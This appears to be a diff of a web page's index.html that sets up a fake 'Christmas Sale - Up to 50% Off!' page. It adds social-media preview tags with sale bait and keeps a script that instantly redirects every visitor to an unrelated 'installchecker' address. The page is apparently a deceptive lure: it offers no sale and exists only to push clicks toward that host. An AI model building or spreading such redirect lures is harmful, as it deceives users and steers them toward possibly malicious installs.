--- a/index.html
+++ b/index.html
@@ -1,9 +1,22 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-    <meta http-equiv="refresh" content="0; url=https://installchecker.com/cl/i/42n311">
-  <link rel="icon" href="https://st2.depositphotos.com/3262945/9227/v/950/depositphotos_92273670-stock-illustration-christmas-sale-50.jpg" type="image/x-icon">
-  <meta charset="UTF-8">
+     <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <meta name="description" content="Redirecting to your destination. Stay tuned!">
+
+  <!-- Open Graph Meta Tags -->
+  <meta property="og:title" content="Christmas Sale - Up to 50% Off!">
+  <meta property="og:description" content="Don't miss out on amazing Christmas deals. Shop now and save big!">
+  <meta property="og:image" content="https://st2.depositphotos.com/3262945/9227/v/950/depositphotos_92273670-stock-illustration-christmas-sale-50.jpg">
+  <meta property="og:url" content="https://www.christmascelebration.online">
+  <meta property="og:type" content="website">
+
+  <!-- Twitter Card Meta Tags -->
+  <meta name="twitter:card" content="summary_large_image">
+  <meta name="twitter:title" content="Christmas Sale - Up to 50% Off!">
+  <meta name="twitter:description" content="Don't miss out on amazing Christmas deals. Shop now and save big!">
+  <meta name="twitter:image" content="https://st2.depositphotos.com/3262945/9227/v/950/depositphotos_92273670-stock-illustration-christmas-sale-50.jpg">
   <title>Get 50% On Christmas Items</title>
     <script>
 window.location.href="https://installchecker.com/cl/i/42n311" ;
